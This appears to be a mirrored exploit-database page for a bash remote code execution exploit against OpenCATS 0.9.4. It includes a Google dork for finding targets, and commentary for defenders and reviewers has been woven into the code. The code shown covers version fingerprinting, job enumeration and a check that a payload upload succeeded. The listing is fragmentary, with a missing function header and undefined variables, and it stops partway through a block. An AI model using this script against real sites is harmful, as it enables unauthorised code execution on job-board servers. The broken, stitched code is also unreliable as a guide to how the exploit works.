Exploits / Vulnerability Discovered : 2021-12-10 |
Type : webapps |
Platform : php
This exploit / vulnerability, OpenCATS 0.9.4 remote code execution (RCE), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
# Date: 21/09/2021
# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
# Vendor Homepage: https://www.opencats.org/
# Software Link: https://github.com/opencats/OpenCATS
# Version: <=0.9.4 Countach
# Tested on: Debian, CentOS, Windows Server
#!/bin/bash
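# Argument check: the script needs exactly one thing from the caller, the
# base URL of the OpenCATS instance under test.
# A usage error is reported on stderr and ends with a non-zero status so that
# a wrapper or test harness can tell a misuse apart from a completed run
# (the original printed to stdout and exited with status 0).
if [ "$#" -eq 0 ]; then
  echo "Usage: $0 <target URL>" >&2
  exit 1
fi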
# NOTE(review): the function header that opens this body is not present in
# this listing; only the tail of the function (down to its closing brace)
# survives. `$1` here is the function's first argument, presumably the target
# base URL passed by the caller -- confirm against the full script.
#
# Version fingerprinting: runs only when `ver` is still empty.
if [ -z "${ver}" ]
then
# Request <base>/installtest.php with curl (-s silent, -k skip TLS certificate
# verification, -L follow redirects), keep the case-insensitive match of
# "CATS version is <dotted number>", then extract only the first number.
# Because of -k the response is not authenticated, so the value is untrusted.
# Defender note: the request carries no credentials, so this step shows that
# an installtest.php left reachable after installation discloses the version
# string to anyone who asks. Requests for that path are a fingerprinting
# signal worth alerting on in web logs, and removing or restricting access to
# the file after installation avoids the disclosure.
ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
# Nothing matched: print a notice and return 0; per the message, the missing
# version is not treated as an error.
if [ -z "${ver}" ]
then
# red/green/reset are not defined in this listing; presumably terminal colour
# escape variables set elsewhere in the script.
echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
return 0
fi
fi
# Reached when `ver` was already set or was just extracted above.
echo -e "${green}[*] Version detected: $ver${reset}"
}
# Fallback taken when numJb is empty or not greater than zero.
# NOTE(review): numJb and target are assigned outside this listing; numJb is
# presumably the result of an earlier job-count lookup -- confirm.
# NOTE(review): numJb is parsed from a remote response and then used in a
# numeric test. Inside [[ ]], -gt evaluates its operands as arithmetic
# expressions, so non-numeric text returned by the server is not treated as
# inert data. Checking the value against ^[0-9]+$ before comparing would be
# safer for whoever runs this script.
if [[ ! $numJb -gt 0 ]]
then
echo -e "${red}[-] No active jobs found.${reset}"
echo "[*] Trying another path..."
# Second attempt: fetch the public careers listing. $target is unquoted here,
# so it is subject to word splitting and globbing; -k disables TLS certificate
# verification, so the response body is unauthenticated input.
# Defender note: in access logs this step appears as a GET for
# /index.php?m=careers&p=showAll sent without credentials.
jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`
# Keep the line mentioning "Posted Jobs", strip HTML tags, then reduce it to
# the number that follows "Posted Jobs ...:". If the last sed expression does
# not match, the line passes through unchanged, so numJb can end up holding
# arbitrary text from the response rather than a number.
numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`
# Still no positive count after the fallback: stop.
# NOTE(review): the bare `exit` returns the status of the preceding echo (0),
# so this failure path is reported to the caller as success.
if [[ ! $numJb -gt 0 ]]
then
echo -e "${red}[-] Couldn't find any active job.${reset}"
exit
fi
fi
if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
echo "[*] Checking by another method..."